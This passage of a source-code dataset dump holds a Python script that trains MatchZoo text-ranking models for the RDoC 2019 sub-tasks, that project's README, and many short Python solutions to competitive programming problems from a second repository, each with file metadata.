mz.metrics.MeanAveragePrecision()\n]\n\n\nmodel = mz.models.DSSM()\nmodel.params['input_shapes'] = preprocessor.context['input_shapes']\nmodel.params['task'] = ranking_task\nmodel.params['mlp_num_layers'] = 3\nmodel.params['mlp_num_units'] = 300\nmodel.params['mlp_num_fan_out'] = 128\nmodel.params['mlp_activation_func'] = 'relu'\nmodel.guess_and_fill_missing_params()\nmodel.build()\nmodel.compile()\n\n\ntrain_generator = mz.PairDataGenerator(train_processed, num_dup=1, num_neg=4, batch_size=64, shuffle=True)\n\nvalid_x, valid_y = valid_processed.unpack()\nevaluate = mz.callbacks.EvaluateAllMetrics(model, x=valid_x, y=valid_y, batch_size=len(pred_x))\n\nhistory = model.fit_generator(train_generator, epochs=20, callbacks=[evaluate], workers=5, use_multiprocessing=False)\n'''\n\npreprocessor = mz.preprocessors.BasicPreprocessor(remove_stop_words=True)\n#ranking_task = mz.tasks.Ranking(loss=mz.losses.RankHingeLoss())\n#preprocessor = mz.preprocessors.DSSMPreprocessor()\nranking_task = mz.tasks.Ranking(loss=mz.losses.RankCrossEntropyLoss())\ntrain_processed = preprocessor.fit_transform(train_pack)\ntest_processed = preprocessor.transform(valid_pack)\n\n\n\nranking_task.metrics = [\n mz.metrics.NormalizedDiscountedCumulativeGain(k=3),\n mz.metrics.NormalizedDiscountedCumulativeGain(k=5),\n mz.metrics.MeanAveragePrecision()\n]\n\n#x = int(input('Enter a number1: '))\n\nmodel = mz.models.CDSSM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['filters'] = 64\nmodel.params['conv_activation_func'] = 'relu'\nmodel.params['optimizer'] = 'adam'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n\n'''\nmodel = mz.models.ConvKNRM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\n#model.params['embedding_output_dim'] = 300\nmodel.params['embedding_trainable'] = True\nmodel.params['filters'] = 128 \nmodel.params['conv_activation_func'] = 'tanh' \nmodel.params['max_ngram'] = 3\nmodel.params['use_crossmatch'] = True \nmodel.params['kernel_num'] = 11\nmodel.params['sigma'] = 0.1\nmodel.params['exact_sigma'] = 0.001\nmodel.params['optimizer'] = 'adadelta'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = mz.models.ArcII()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['embedding_output_dim'] = 100\nmodel.params['embedding_trainable'] = True\nmodel.params['num_blocks'] = 2\nmodel.params['kernel_1d_count'] = 32\nmodel.params['kernel_1d_size'] = 3\nmodel.params['kernel_2d_count'] = [64, 64]\nmodel.params['kernel_2d_size'] = [3, 3]\nmodel.params['pool_2d_size'] = [[3, 3], [3, 3]]\nmodel.params['optimizer'] = 'adam'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = mz.models.KNRM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['embedding_trainable'] = True\nmodel.params['kernel_num'] = 11\nmodel.params['sigma'] = 0.1\nmodel.params['exact_sigma'] = 0.001\nmodel.params['optimizer'] = 'adadelta'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = mz.models.DUET()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['embedding_output_dim'] = 300\nmodel.params['lm_filters'] = 32\nmodel.params['lm_hidden_sizes'] = [32]\nmodel.params['dm_filters'] = 32\nmodel.params['dm_kernel_size'] = 3\nmodel.params['dm_d_mpool'] = 4\nmodel.params['dm_hidden_sizes'] = [32]\nmodel.params['dropout_rate'] = 0.5\nmodel.params['optimizer'] = 'adagrad'\nmodel.guess_and_fill_missing_params()\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = mz.models.MVLSTM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['embedding_output_dim'] = 300\nmodel.params['lstm_units'] = 50\nmodel.params['top_k'] = 20\nmodel.params['mlp_num_layers'] = 2\nmodel.params['mlp_num_units'] = 10\nmodel.params['mlp_num_fan_out'] = 5\nmodel.params['mlp_activation_func'] = 'relu'\nmodel.params['dropout_rate'] = 0.5\nmodel.params['optimizer'] = 'adadelta'\nmodel.guess_and_fill_missing_params()\nmodel.build()\nmodel.compile()\n'''\n\n'''\nmodel = mz.models.DSSM()\nmodel.params.update(preprocessor.context)\nmodel.params['task'] = ranking_task\nmodel.params['mlp_num_layers'] = 3\nmodel.params['mlp_num_units'] = 300\nmodel.params['mlp_num_fan_out'] = 128\nmodel.params['mlp_activation_func'] = 'relu'\nmodel.guess_and_fill_missing_params(verbose=0)\nmodel.build()\nmodel.compile()\n'''\n\n#x, y = train_processed.unpack()\npred_x, pred_y = test_processed.unpack()\n#model.fit(x, y, batch_size=32, epochs=5)\n\n\nevaluate = mz.callbacks.EvaluateAllMetrics(model, x=pred_x, y=pred_y, batch_size=len(pred_y))\nprint(len(pred_y))\nx = int(input('Enter a number2: '))\n#data_generator = mz.DataGenerator(train_processed, batch_size=x)\ndata_generator = mz.PairDataGenerator(train_processed, batch_size=x, shuffle=True)\nprint('num batches:', str(len(data_generator)))\nx = int(input('Enter a number3: '))\nhistory= model.fit_generator(data_generator, epochs=x, callbacks=[evaluate], use_multiprocessing=True, workers=4)\n\n#x = int(input('Enter a number4: '))\nmodel.save('my-model')\n" }, { "alpha_fraction": 0.7585421204566956, "alphanum_fraction": 0.7881549000740051, "avg_line_length": 60.71428680419922, "blob_id": "ea4d8fb14eef25de69bfead7f8d577c353869ffa", "content_id": "8763ff3729ad86b4e4fb718e2acd17ccdae79e16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 439, "license_type": "no_license", "max_line_length": 149, "num_lines": 7, "path": "/README.md", "repo_name": "thepanacealab/RDoC-Shared-sub-tasks-2019", "src_encoding": "UTF-8", "text": "This project contains useful source codes for:\n 1.creating datasets for RDoC 2019 sub-tasks\n 2. performing the sub-tasks using deep learning approaches.\n \n Link for competition webpage containing extra information about sub-task: https://sites.google.com/view/rdoc-task/task\n \n Link of relevant and non-relevant abstracts for RDoC constructs: https://drive.google.com/file/d/1c3CK13cOqu_jzxGeLSCsKN1mb0k6vDJg/view?usp=sharing \n \n \n" } ]
2
k0malSharma/Competitive-programming
https://github.com/k0malSharma/Competitive-programming
2539430fac8c07769dc801395f026c1d282c3b2f
141cc84bd31c2cf304a92f01776a5d97c51144c5
b1e4e980267755f39b7933165f337006229c2d31
refs/heads/master
2021-07-10T17:44:38.367630
2020-09-01T11:38:03
2020-09-01T11:38:03
194,213,890
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.3459915518760681, "alphanum_fraction": 0.39240506291389465, "avg_line_length": 22.700000762939453, "blob_id": "b5b21a756e968d713caaff5b5b421d065205f4bc", "content_id": "1225f500d793e9ab7cfdad765ab2ab15f9bf4593", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/PLMU.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n x,y,c=0,0,0\n for i in range(n):\n if(a[i]==0):\n x+=1\n if(a[i]==2):\n y+=1\n print(x*(x-1)//2+y*(y-1)//2)\n" }, { "alpha_fraction": 0.46875, "alphanum_fraction": 0.4765625, "avg_line_length": 20.33333396911621, "blob_id": "4b15019dee73ef23ad1eb4c5e2867640e7c6b061", "content_id": "9116a22294f5ab6bb571234340b08d945c955f41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 128, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/UWCOI20A.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[0]*n\n for i in range(n):\n a[i]=int(input())\n print(max(a))\n" }, { "alpha_fraction": 0.4251627027988434, "alphanum_fraction": 0.43600866198539734, "avg_line_length": 22.049999237060547, "blob_id": "074536d15c6d73644bb0ee18eaa405b1f66861e4", "content_id": "21be87f5933c9f5a7036d6df6992de29abc9e979", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 461, "license_type": "no_license", "max_line_length": 39, "num_lines": 20, "path": "/ATTND.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=[]\n copy = []\n for i in range(n):\n s.append(input())\n copy.append(s[i].split()[0])\n copy = sorted(copy)\n repeated = []\n j = 1\n for i in copy:\n if i in copy[j:]:\n repeated.append(i)\n j+=1\n for i in range(n):\n if s[i].split()[0] in repeated:\n print(s[i])\n else:\n first = s[i].split()\n print(first[0])\n" }, { "alpha_fraction": 0.3566666543483734, "alphanum_fraction": 0.3866666555404663, "avg_line_length": 20.69230842590332, "blob_id": "398a876c670243ab56ce1fc87a051245a8076fe5", "content_id": "3375648dfdd5d07fbb3a227984ba988ccf326382", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 300, "license_type": "no_license", "max_line_length": 51, "num_lines": 13, "path": "/WATSCORE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n p=[0]*n\n s=[0]*n\n a=[0]*11\n add=0\n for i in range(n):\n p[i],s[i]=[int(j) for j in input().split()]\n if(a[p[i]-1]<s[i]):\n a[p[i]-1]=s[i]\n for i in range(8):\n add+=a[i]\n print(add)\n \n \n" }, { "alpha_fraction": 0.5268816947937012, "alphanum_fraction": 0.5376344323158264, "avg_line_length": 30, "blob_id": "3fe8fd8750d84f5f43b600ad7bf02aeeda4b0a45", "content_id": "671332693fc71368b3545e1ce3a5714515e38c33", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 93, "license_type": "no_license", "max_line_length": 41, "num_lines": 3, "path": "/OMWG.PY", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,m=[int(i) for i in input().split()]\n print(2*m*n-m-n)\n" }, { "alpha_fraction": 0.34876543283462524, "alphanum_fraction": 0.3641975224018097, "avg_line_length": 20.35714340209961, "blob_id": "c5ae590c6fbaf06ae977e0bb2e99064669ad7df0", "content_id": "3b7c8ebffaa929cc47447b87bc430157da60dc0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 324, "license_type": "no_license", "max_line_length": 41, "num_lines": 14, "path": "/DIET.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n r,p=0,-1\n for i in range(n):\n r+=a[i]\n r-=k\n if(r<0):\n p=i+1\n break\n if(p==-1):\n print(\"YES\")\n else:\n print(\"NO \",p)\n \n \n" }, { "alpha_fraction": 0.37106919288635254, "alphanum_fraction": 0.4150943458080292, "avg_line_length": 30.799999237060547, "blob_id": "a551cc23da9aa0e3cc9428783caf511b22ee1617", "content_id": "a1e244fb5a602af4e58b7fba20a82fbca3013286", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 318, "license_type": "no_license", "max_line_length": 56, "num_lines": 10, "path": "/BIGSALE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n amt=0\n p,q,d,m,l=[0]*n,[0]*n,[0]*n,[0]*n,[0]*n\n for i in range(n):\n p[i],q[i],d[i]=[int(i) for i in input().split()]\n m[i]=p[i]+((d[i]/100)*p[i])\n l[i]=m[i]-((d[i]/100)*m[i])\n amt+=(p[i]-l[i])*q[i]\n print('{0:.5f}'.format(amt))\n" }, { "alpha_fraction": 0.3295964002609253, "alphanum_fraction": 0.3632287085056305, "avg_line_length": 23.77777862548828, "blob_id": "8e90cc38838f5d160ceeb6ce7978a0449af0bce8", "content_id": "e5ec4148d59a9f05835d3bccfc87b967d426d67a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 446, "license_type": "no_license", "max_line_length": 47, "num_lines": 18, "path": "/HILLS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,u,d=[int(i) for i in input().split()]\n h=[int(i) for i in input().split()]\n k=1\n p=1\n for i in range(n-1):\n if((h[i]+u)>=h[i+1] and h[i]<h[i+1]):\n k+=1\n elif((h[i]-d)<=h[i+1] and h[i]>h[i+1]):\n k+=1\n elif(h[i]==h[i+1]):\n k+=1\n elif(h[i]-d>h[i+1] and p==1):\n k+=1\n p-=1\n else:\n break;\n print(k)\n" }, { "alpha_fraction": 0.4581005573272705, "alphanum_fraction": 0.46927374601364136, "avg_line_length": 16.899999618530273, "blob_id": "bc7dce32e1e20494757a6aa1a844bea959c77468", "content_id": "5d6e241643af6129767a79b2e5a4e0e9ac3cba9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 179, "license_type": "no_license", "max_line_length": 44, "num_lines": 10, "path": "/SINS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def gcd(x,y):\n if(x==0):\n return(y)\n return gcd(y%x,x)\n\n \nfor _ in range(int(input())):\n a, b = [int(i) for i in input().split()]\n c=gcd(a,b)\n print(2*c)\n" }, { "alpha_fraction": 0.3478260934352875, "alphanum_fraction": 0.35805627703666687, "avg_line_length": 19.578947067260742, "blob_id": "aed6b3a77a30482917d13f94c3ea9b6f0d2c54a6", "content_id": "daf703ad5267e2aa8e5b620aeeeea60c76df3d3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 39, "num_lines": 19, "path": "/COVIDLQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=True\n for i in range(n):\n if a[i]==1:\n c=i\n break\n for i in range(c+1,n):\n if a[i]==1:\n if i-c<6:\n b=False\n break\n else:\n c=i\n if b:\n print(\"YES\")\n else:\n print(\"NO\")\n" }, { "alpha_fraction": 0.4145728647708893, "alphanum_fraction": 0.4396984875202179, "avg_line_length": 25.53333282470703, "blob_id": "5a52af7310543e69ea6d789b2fbc8f12f3f90571", "content_id": "0bfcd6078d14572b41d9089c4dcdd87b65a680ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 398, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/DEPCHEF.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n = int(input())\n a = [int(i) for i in input().split()]\n d = [int(i) for i in input().split()]\n stat = [a[1]+a[n-1]]\n for i in range(1,n-1):\n stat.append(a[i-1]+a[i+1])\n stat.append(a[n-2]+a[0])\n ct = 0\n maxx = -1\n for i in range(n):\n if stat[i] < d[i]:\n if maxx < d[i]:\n maxx = d[i]\n print(maxx)\n" }, { "alpha_fraction": 0.3455657362937927, "alphanum_fraction": 0.3669724762439728, "avg_line_length": 19.399999618530273, "blob_id": "7dbab4df38f452b11032deb248c1d460fd86e0c7", "content_id": "bbcc629db9e02f858f1d9d67cfba22540b5d73e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/CODERLIF.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=[int(i) for i in input().split()]\n c=0\n for i in a:\n if(i==1):\n c+=1\n else:\n c=0\n if(c==6):\n c=-1\n break\n if(c!=-1):\n print(\"#allcodersarefun\")\n else:\n print(\"#coderlifematters\")\n \n" }, { "alpha_fraction": 0.32594937086105347, "alphanum_fraction": 0.34493669867515564, "avg_line_length": 20.066667556762695, "blob_id": "61765e0e50a3c51de6d7d1d8eda0693105f11f1b", "content_id": "04cf05a3e1ba14b866702eb698f4c419b22b31ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 316, "license_type": "no_license", "max_line_length": 43, "num_lines": 15, "path": "/CATSDOGS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n c,d,l=[int(i) for i in input().split()]\n if(l%4!=0 or l<(d*4)):\n print(\"no\")\n else:\n m=0\n l//=4\n if(c>d*2):\n m=c-d\n else:\n m=d\n if(m<=l and l<=(c+d)):\n print(\"yes\")\n else:\n print(\"no\")\n" }, { "alpha_fraction": 0.28921568393707275, "alphanum_fraction": 0.3235294222831726, "avg_line_length": 16, "blob_id": "32b896c7cacde10ac52530b62af17a5d9d20ce92", "content_id": "590775f5deaa054e7db715d93b0e8fe9a9236771", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 204, "license_type": "no_license", "max_line_length": 29, "num_lines": 12, "path": "/XYSTR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n i=0\n p=0\n while(i<((len(s)-1))):\n if(s[i]!=s[i+1]):\n i+=1\n p+=1\n else:\n pass\n i+=1\n print(p)\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.4628099203109741, "avg_line_length": 25.88888931274414, "blob_id": "d36c2eb6a6405176d82673930d05e2eb0e8a569f", "content_id": "37138eebcc8bd008730534aa0e2eaf98c66d91fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 39, "num_lines": 9, "path": "/MDL.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=[int(i) for i in a]\n a.sort(reverse=True)\n for i in b:\n if(i==a[0] or i==a[n-1]):\n print(i,end=\" \")\n print(\"\\n\",end=\"\")\n" }, { "alpha_fraction": 0.38297873735427856, "alphanum_fraction": 0.41033434867858887, "avg_line_length": 16.3157901763916, "blob_id": "006d36fcc4e4f7dffe8d81e04d507bdb1c3028ee", "content_id": "68e5340340e744160a5c77d7e399ae6e0dd8601c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 37, "num_lines": 19, "path": "/TWTCLOSE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n,k=[int(i) for i in input().split()]\ns=[False]*n\na=[]\nfor i in range(k):\n x=input().split()\n if (len(x)==2):\n a.append(int(x[1]))\n else:\n a.append(-1)\nfor i in a:\n if(i==-1):\n s=[0]*n\n else:\n s[i-1]=not s[i-1]\n c=0\n for j in s:\n if(j==True):\n c+=1\n print(c)\n" }, { "alpha_fraction": 0.5653846263885498, "alphanum_fraction": 0.5692307949066162, "avg_line_length": 24.5, "blob_id": "51db943119295b3bedff946a413edfa5f3ae52bc", "content_id": "8638a57ef8f937f10143a3c7f6c58aa218ac01c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "no_license", "max_line_length": 52, "num_lines": 10, "path": "/USANBOLT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor q in range(int(input())):\n bolt,tiger,a,v=[int(i) for i in input().split()]\n tiger+=bolt\n time_bolt=bolt/v\n time_tiger=math.sqrt((2*tiger)/a)\n if(time_bolt<time_tiger):\n print(\"Bolt\")\n else:\n print(\"Tiger\")\n \n" }, { "alpha_fraction": 0.3350515365600586, "alphanum_fraction": 0.39175257086753845, "avg_line_length": 22.375, "blob_id": "b84ef6057d9f52c03655a523aaad04b611c7ae12", "content_id": "d5d0ee24273d512eaf1f67d70d3bebfb3bed17b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/LAPIN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n a=[0]*26\n b=[0]*26\n for i in range(0,len(s)//2):\n a[ord(s[i])-97]+=1\n if(len(s)%2==0):\n for i in range(len(s)//2,len(s)):\n b[ord(s[i])-97]+=1\n else:\n for i in range(len(s)//2+1,len(s)):\n b[ord(s[i])-97]+=1\n if(a==b):\n print(\"YES\")\n else:\n print(\"NO\")\n \n \n" }, { "alpha_fraction": 0.3827493190765381, "alphanum_fraction": 0.39083558320999146, "avg_line_length": 23.733333587646484, "blob_id": "8c3974655a7bf263b11830d1d3f7fa09d272b665", "content_id": "3764a5f2cd8ce1da507b2397c87e6aa4bbcad243", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 371, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/FRGTNLNG.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n s=input().split()\n a,m=[],[0]*n\n for i in range(k):\n a=input().split()\n for j in range(n):\n if s[j] in a:\n m[j]=1\n for i in m:\n if(i==1):\n print(\"YES\",end=' '),\n else:\n print(\"NO\",end=' '),\n print(end='\\n')\n" }, { "alpha_fraction": 0.3304157555103302, "alphanum_fraction": 0.35886213183403015, "avg_line_length": 20.761905670166016, "blob_id": "7e35cf7f4a0a2c344c612a4e9029666a09555d10", "content_id": "c0c1e4510ba8505522a05bb7577d0c28772e9239", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 457, "license_type": "no_license", "max_line_length": 39, "num_lines": 21, "path": "/RAINBOWA.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n k=n-1\n flag=0\n a=[int(i) for i in input().split()]\n s=[1,2,3,4,5,6,7]\n st=list(set(a))\n print(s,\" \",st)\n if(s==st):\n for i in range(n//2):\n print(a[i],\" \",a[k])\n if(a[i]!=a[k]):\n flag=1\n break; \n k-=1\n if(flag==0):\n print(\"yes\")\n else:\n print(\"no\")\n else:\n print(\"no\")\n" }, { "alpha_fraction": 0.443113774061203, "alphanum_fraction": 0.46706587076187134, "avg_line_length": 17.33333396911621, "blob_id": "817b7b60e28d45300b02fa08c2728984327cb794", "content_id": "029ba6187b88b0162b8c131007e316e7f500aee7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 34, "num_lines": 9, "path": "/ICL1902.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n c,s=0,0\n while(n>0):\n s=math.floor(math.sqrt(n))\n n-=s*s\n c+=1\n print(c) \n" }, { "alpha_fraction": 0.43465909361839294, "alphanum_fraction": 0.44034090638160706, "avg_line_length": 19.176469802856445, "blob_id": "f75081f13a9267e18d7ac16f78c4d1942b5b7d87", "content_id": "c27d85e4b5e62eadb133af642db9d03d9c6ebd43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 39, "num_lines": 17, "path": "/ALEXTASK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "def gcd(a,b): \n if a == 0: \n return b \n return gcd(b % a, a) \n \ndef lcm(a,b): \n return (a*b) // gcd(a,b)\n\nfor _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n a.sort()\n s=[]\n for i in range(n):\n for j in range(i+1,n):\n s.append(lcm(a[i],a[j]))\n print(min(s))\n \n" }, { "alpha_fraction": 0.41228070855140686, "alphanum_fraction": 0.42690059542655945, "avg_line_length": 25.30769157409668, "blob_id": "57db7305f170327c1783183674aca65d9abeb3b9", "content_id": "4be63307d8e7e336a6d0169f1a000f33dab2561c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 56, "num_lines": 13, "path": "/TABLET.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,b=[int(i) for i in input().split()]\n w,h,p=[0]*n,[0]*n,[0]*n\n for i in range(n):\n w[i],h[i],p[i]=[int(i) for i in input().split()]\n a=0\n for i in range(n):\n if(p[i]<=b and a<(w[i]*h[i])):\n a=w[i]*h[i]\n if(a==0):\n print(\"no tablet\")\n else:\n print(a)\n" }, { "alpha_fraction": 0.44694533944129944, "alphanum_fraction": 0.4565916359424591, "avg_line_length": 25.727272033691406, "blob_id": "2fecf055f5fe83803a4935d9cd9195f5954ae046", "content_id": "bd197dbbce1441bf3588938f022a3da3bbdd7912", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 311, "license_type": "no_license", "max_line_length": 39, "num_lines": 11, "path": "/MOVIEWKN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n l=[int(i) for i in input().split()]\n r=[int(i) for i in input().split()]\n k=[]\n for i in range(n):\n k.append(l[i]*r[i])\n if (k.count(max(k))==1):\n print(k.index(max(k))+1)\n else:\n print(r.index(max(r))+1)\n \n" }, { "alpha_fraction": 0.4920634925365448, "alphanum_fraction": 0.5132275223731995, "avg_line_length": 22.625, "blob_id": "f152a005c18ddb0c90cd8052cd2c67dc3d55ec65", "content_id": "9091f2dcee4bddcb101f8c200e0aac6eb70d211b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 40, "num_lines": 8, "path": "/CHEFSTR1.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n s=[int(i) for i in input().split()]\n p=0\n for i in range(n-1):\n p+=math.fabs(s[i+1]-s[i])-1\n print(int(p))\n" }, { "alpha_fraction": 0.34510868787765503, "alphanum_fraction": 0.38315218687057495, "avg_line_length": 19.44444465637207, "blob_id": "6da66653dd5d5f5f0c6fab6cb75c1cb55046146a", "content_id": "77a0a78a7c1c6e627b59c0d5a17a11f5738e85c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 368, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/TICKETS5.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s = input()\n n = len(s)\n flag = 0\n if (n%2!=0):\n flag=1\n elif (s[0]==s[1]) and n==2:\n flag=1\n for i in range(n):\n if i+2 < n and s[i]==s[i+2] and s[i]!=s[i+1]:\n flag=0\n else:\n break\n \n if flag==0 and i==n-2:\n print(\"YES\")\n else:\n print(\"NO\")\n" }, { "alpha_fraction": 0.3348519504070282, "alphanum_fraction": 0.35535308718681335, "avg_line_length": 21.210525512695312, "blob_id": "fcd2199b4c52ce324805a2b271996b2e8c0fab29", "content_id": "3f110d6c3e3a18b59df53c5ff6af8eced9f1126c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 439, "license_type": "no_license", "max_line_length": 36, "num_lines": 19, "path": "/COOMILK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input().split()\n flag=0\n for i in range(n):\n if(s[0]==\"cookie\" and n==1):\n flag+=1\n break\n if(s[n-1]==\"cookie\"):\n flag+=1\n break\n if(s[i]==\"cookie\"):\n if(s[i+1]!=\"milk\"):\n flag+=1\n break\n if(flag==0):\n print(\"YES\")\n else:\n print(\"NO\")\n \n" }, { "alpha_fraction": 0.48407644033432007, "alphanum_fraction": 0.5031847357749939, "avg_line_length": 25.16666603088379, "blob_id": "b960916d2da45859f1dbdc8c239a5decf6d404af", "content_id": "acb169bca7bb7d9ccdc7e18aaaacc88141b5362a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 41, "num_lines": 6, "path": "/PPSUM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n d,n=[int(i) for i in input().split()]\n s=0\n for i in range(d):\n n=sum([j for j in range(1,n+1)])\n print(n)\n" }, { "alpha_fraction": 0.30041152238845825, "alphanum_fraction": 0.3292181193828583, "avg_line_length": 21.714284896850586, "blob_id": "2c20cba2585654e6fc0f85cb2194146f1ec5ba35", "content_id": "50110d28a79f0d3da78a596351914fd772650a57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 486, "license_type": "no_license", "max_line_length": 41, "num_lines": 21, "path": "/EXAM1.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n u=input()\n if s==u:\n print(n)\n else:\n k=0\n flag=0\n for i in range(n-1):\n if(s[i]==u[i] and flag==0):\n k+=1\n elif(u[i]=='N' and flag==0):\n k+=0\n elif(u[i]!=s[i] and flag==0):\n flag+=1\n else:\n flag=0\n if(flag==0 and s[n-1]==u[n-1]):\n k+=1\n print(k)\n \n" }, { "alpha_fraction": 